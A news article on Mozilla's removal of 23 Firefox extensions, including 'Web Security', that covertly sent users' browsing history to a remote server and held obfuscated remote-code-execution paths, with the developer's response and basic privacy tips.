Mozilla has blocked 23 extensions this week after unlock Origin developer Raymond Hill and others started noticing discrepancies in a browser security add-on called Web Security. The Firefox extension had over 220 000 downloads and a 4.5 out of 5 rating by the time people started questioning some of the plugin’s code.
According to Hill, he started noticing strange behavior in the plugin’s functionality. He posted his concerns about it on a Firefox post on Reddit – where he said Web Security seems to send every page you load in your browser to a fixed IP address, which was later identified to belong to a server in Germany. “The posted data is garbled, maybe someone will have the time to investigate further,” Hill said on Reddit. Interestingly enough, this same Reddit thread leads to a blog post on Mozilla’s website called “Make your Firefox browser a privacy superpower with these extensions” where they listed Web Security as one of the must-have Firefox privacy plugins (now recently removed from the list).
However, it didn’t take long for others to start looking into what the extension’s code does and some of the code indicated to be potentially malicious. Web Security, for its part, is aimed at protecting users from visiting websites that are potentially infected with malware or are known to conduct phishing scams. But it seems the app itself was unsafe and could have exposed users to remote attacks.
After Hill’s post, a popular German blogger known as Mike Kuketz posted an article on his website that also spoke about the app. He warned his readers that it looks like Web Security might be sending sensitive information to an undisclosed server. Then those who started picking apart the code found that it was assigning each user an ID and was sending information related to each ID, including info it labeled as ‘old-URL’ and ‘new-URL,’ to the German IP address that Hill had highlighted
Mozilla Engineers Take Action
The flurry of activity prompted Mozilla to take a look into the Web Security plugin themselves, and a Mozilla engineer Rob Wu started the arduous process of finding out what this extension has been doing. But he didn’t just stop there. This sparked an investigation into all other browser extensions in the Firefox portfolio as well, and according to Wu, he found similar questionable behavioral patterns in 22 other Firefox extensions. Which correlated with a user’s comment on a ghacks.net forum which stated that Web Security, Browser-Security, and Browser Privacy all seem to do this, and, what’s more, that they all send browser history information to the same IP address.
We identified two patterns in with regard to those extensions. The first pattern takes on the form of data collection, which then sends your browsing history to a remote server, while the second doesn’t track your browsing history excessively, but did open up some vulnerabilities in the system that could allow an attacker to send commands from a remote server through remote code execution. While speaking to Bleeping Computer, Wu said that “the sheer number of misleading identifiers, obfuscated URLs / constants, and covert data flows left me with little doubt about the intentions of the author: It is apparent that they tried to hide malicious code in their add-on.”
The company also issued a statement about the situation and said the following:
“A number of reports have come up that the Web Security add-on (https://addons.mozilla.org/addon/web-security/) is sending visited URLs to a remote server. While this may seem reasonable for an add-on that checks visited web pages for their security, other issues have been brought up:
1) The add-on sends more data than what seems necessary to operate.
2) Some of the data is sent unsafely.
3) The add-on doesn’t clearly disclose this practice, beyond a mention in a large Privacy Policy.
4) The code has the potential of executing remote code, which is partially obfuscated in its implementation.
5) Multiple add-ons with very different features and different authors have the same code. Further inspection reveals they may all be the same person/group.”
Following the incident, Mozilla decided to remove these 23 extensions from the Firefox extension collection, and they also had their engineers disable the add-ons in users’ browsers. Which means the potentially harmful code will no longer have access to users’ devices or information.
Web Security Developer Responds To Concerns
It didn’t take long for representatives behind the plugin to voice their side of the story.
Fabian Simon, who is a representative of the company that owns the Web Security extension, answered the issues highlighted by Mozilla by commenting on their statement under the profile name of Lutz Falkenburg. In these comments, Fabian directly addresses the problems Mozilla listed, saying that they use the URL’s they collect to check against a global blacklist and that the server needs access to a user’s recent browser history to map how a user reached a malicious site. “Thus after receiving the IP-address (obviously necessary for the communication), we immediately anonymize it or even delete it completely. We have no stake in tracking the user only the malicious sites that are visited,” Fabian went on to say.
In these comments, Fabian also mentions that the company is aware that they have made mistakes, that their code was not correctly encrypted but that it has been fixed now, and that they would like to work with Mozilla to fix any dubious code as well as to be more transparent in their communication to their users in the future.
So while the potentially harmful effects of the Web Security code might have been caught early enough to prevent any damage to users, it still serves as a big eye-opener to just how much trust we’re giving to third-party companies to protect our cybersecurity. And those companies might not always get things right.
Check Your (Cyber)self
For years people have been debating about complete online privacy and security. Some believe that taking control of your anonymity through a decentralized internet is the answer, while others simply use a VPN and believe that’s enough to keep their identities and browsing data safe. Truth be told, it’s hard to gauge how vulnerable we are. It’s also a broad topic that needs a whole discussion of its own to encompass all the details. And that means we’re only touching upon the surface of the problem right here. But if you know that you’ve been a little lax in the department of cybersecurity (as many of us have), then there are some things you can do.
While it’s nearly impossible to be completely safe, you can protect yourself by doing things like:
- Reading through privacy policies. I know almost none of us do that, but they are there for a reason. If you’re really worried about what companies are doing with your private browsing data and identity, then that’s a good place to start.
- Read up on any new programs or systems you want to use or install. People will usually let the internet know their displeasure if they find any sketchy things going on with a site or an app, and there are plenty of sites dedicated to let you know just that.
- Don’t install or download anything if you’re not sure where it comes from. It’s interesting that this still needs to be said in 2018, but you would be surprised at how many times people don’t know whether they’re downloading from a reputable source or not.
- Don’t click on any links sent to you from an unknown source. Again, this has been said many times over, but people still fall for it.
- If you’re really keen to make sure any sensitive information you might have doesn’t fall into just anyone’s hands, then you can look into encryption. End-to-end encryption is probably the easiest go-to and is already being widely used.